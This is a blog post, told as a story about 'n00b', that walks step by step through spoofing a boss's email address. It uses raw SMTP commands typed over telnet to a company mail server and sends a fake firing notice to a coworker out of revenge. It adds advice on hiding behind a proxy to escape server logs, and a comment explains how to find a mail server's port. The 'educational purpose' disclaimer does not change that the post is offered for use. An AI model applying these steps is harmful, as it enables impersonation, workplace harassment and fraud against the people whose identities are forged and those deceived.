How n00b Learnt To Spoof Email Addresses
Thursday | Labels: Hacking | |The Story starts with our hero n00b coming home all frustrated and tired. It was a hard day at the office. It was his co-worker n00x who made his day terrible. n00b was too pissed off and he was thinking of some way to get even with n00x.
Finally he got the idea to spoof the email address of his boss and with that address, mail noox (brainy, noob!).
n00b works for a firm named firmA. He knows that all the three , he noox and the boss of the company have email account at the server of his company. Thats good! because his idea is going to work for spoofing to and from the mail addresses of the same domain.
He knows his email address was n00b@firma.com. that means he has the domain i.e firma.com
Now his first job is to get the address of the firmA's e-mail server.
Too small a task for our hero. he could have performed a nslookup query from hi command line. but he choose the easier way.
He visited http://centralops.net/co/DomainDossier.aspx . There he typed his domain name i.e firma.com and performed a "DNS Record". He got huge list of information about that domain. But amongst those what he needed was a record labeled MX meaning "Mail Exchange". There were several such records. He choosed one and noted the address of server. It was mail.firma.com (So Far, So good!).
Next he turns off the firewall, opens the command prompt and gives the command:
telnet mail.firma.com 25
He knows its important to input port no in the last part of the command and 25 is the default smtp server port. Even if this particular server used 25 as default smtp port, it is NOT necessary that every smtp server MUST use port 25. Many big services have there port something else. If n00b was to go for them, he would have researched everything on the net before planning the attack.
the connection starts and in the next screen he is greeted by the banner of the mail server which looked something like this
220 mail.firma.com ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Tue, 19 jul 2007 14:44:12 -0500
(looks good!)
now he gives command:
helo firma.com
by this he introduced himself to the server. The server responded back:
mail.firma.com at your service
Next he types:
mail from: boss@firma.com
by this he tells the server is that his account is boss@firma.com.
In next command he defines recipient:
rcpt to: n00x@firma.com
Now he needs to compose the mail. he gives command to start the mail input:
data
He types his mail:
you are a real sucker. I am feed up. You are fired! just get lost.
now he presses enter followed by a "." ( period) and then enter again
The server says that the command was completed successfully. And sends his mail! and n00b walks out for a victory coke!
n00b was an experienced player. He knew that taking security precautions was necessary, coz if he slips, his IP address will be recorded in the log file on the server. He took many measures like doing all from behind a proxy server.
-n00b
DISCLAIMER: Everything posted here is for the educational purpose only. I am NOT responsible for your actions and whatever use you might bring this info into. Hacking is Illegal and Crime.
It is not for the newbies. if you don't know what you are doing you might slip and end up in a big mess! you have been warned. I'll never admit i did it (ofcourse, admitting will be like accepting your crime).
OK, so port 25 doesn't work. How do I "research on the net" to find the real port # ?
Hi rick,
thanks for dropping by.
To answer your question, there are many ways by which you can know which port is being used for pop and smtp.
You can go through configuration settings of mail client program like outlook express, thunderbird etc which are already configured to work on the company mail server,
there are many other ways like going through mx records of the domain.
This job is easy, all you need is to think over it.